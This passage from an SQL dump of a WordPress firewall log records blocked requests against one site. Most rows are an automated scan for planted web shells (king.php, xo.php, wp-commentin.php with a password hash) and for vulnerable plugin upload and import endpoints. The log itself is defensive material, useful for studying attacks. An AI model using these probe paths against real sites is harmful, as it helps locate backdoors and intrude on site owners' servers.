User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12102,1674841784.301667,1674841784.193300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12103,1674841783.067579,1674841782.959400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/upload.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12104,1674841781.611505,1674841781.495000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/a57bze8931.phpHTTP/1.1404-/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYTU3YnplODkzMS5waHBIVFRQLzEuMTQwNC0v\",\"category\":\"brute-force\",\"ssl\":1}'),(12105,1674841780.005626,1674841779.891300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.phpHTTP/1.1404-www.google.com','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocEhUVFAvMS4xNDA0LXd3dy5nb29nbGUuY29t\",\"category\":\"brute-force\",\"ssl\":1}'),(12106,1674841776.559435,1674841776.453300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-engine-module/a57bze8931.phpHTTP/1.1','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lbmdpbmUtbW9kdWxlL2E1N2J6ZTg5MzEucGhwSFRUUC8xLjE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12107,1674841775.255552,1674841775.144200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-engine-module/wp-engine.phpHTTP/1.1404-','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lbmdpbmUtbW9kdWxlL3dwLWVuZ2luZS5waHBIVFRQLzEuMTQwNC0=\",\"category\":\"brute-force\",\"ssl\":1}'),(12108,1674841774.204279,1674841774.094900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/a57bze8931.phpHTTP/1.1','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL2E1N2J6ZTg5MzEucGhwSFRUUC8xLjE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12109,1674841772.909186,1674841772.722500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/ICptimize.php?rchkHTTP%2F1_1404-=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lDcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12110,1674841771.790095,1674841771.681800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/a57bze8931.phpHTTP/1.1\'','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9hNTdiemU4OTMxLnBocEhUVFAvMS4xJw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12111,1674841770.553711,1674841770.442800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/pluginstioptimizations/Mptimizes.php?hamlorszd=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2luc3Rpb3B0aW1pemF0aW9ucy9NcHRpbWl6ZXMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12112,1674841769.206747,1674841769.078200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9zYXZlcG5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12113,1674841767.714796,1674841767.602500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12114,1674841766.414623,1674841766.302800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12115,1674841764.561505,1674841764.454700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12116,1674841763.281014,1674841763.173300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12117,1674841762.110310,1674841762.002300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/wp__config.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3dwX19jb25maWcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12118,1674841760.538308,1674841760.430200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp__config.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwX19jb25maWcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12119,1674841759.009301,1674841758.903000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-class.phpupload.phpwp-content/wp__config.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNsYXNzLnBocHVwbG9hZC5waHB3cC1jb250ZW50L3dwX19jb25maWcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12120,1674841757.928686,1674841757.818400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12121,1674841756.543131,1674841756.435500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/files/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL2ZpbGVzL2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12122,1674841755.809779,1674841755.703600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12123,1674841755.111479,1674841755.000300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQveG8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12124,1674841753.781666,1674841753.675600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3hvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12125,1674841752.521545,1674841752.408200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12126,1674841751.017609,1674841750.910700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 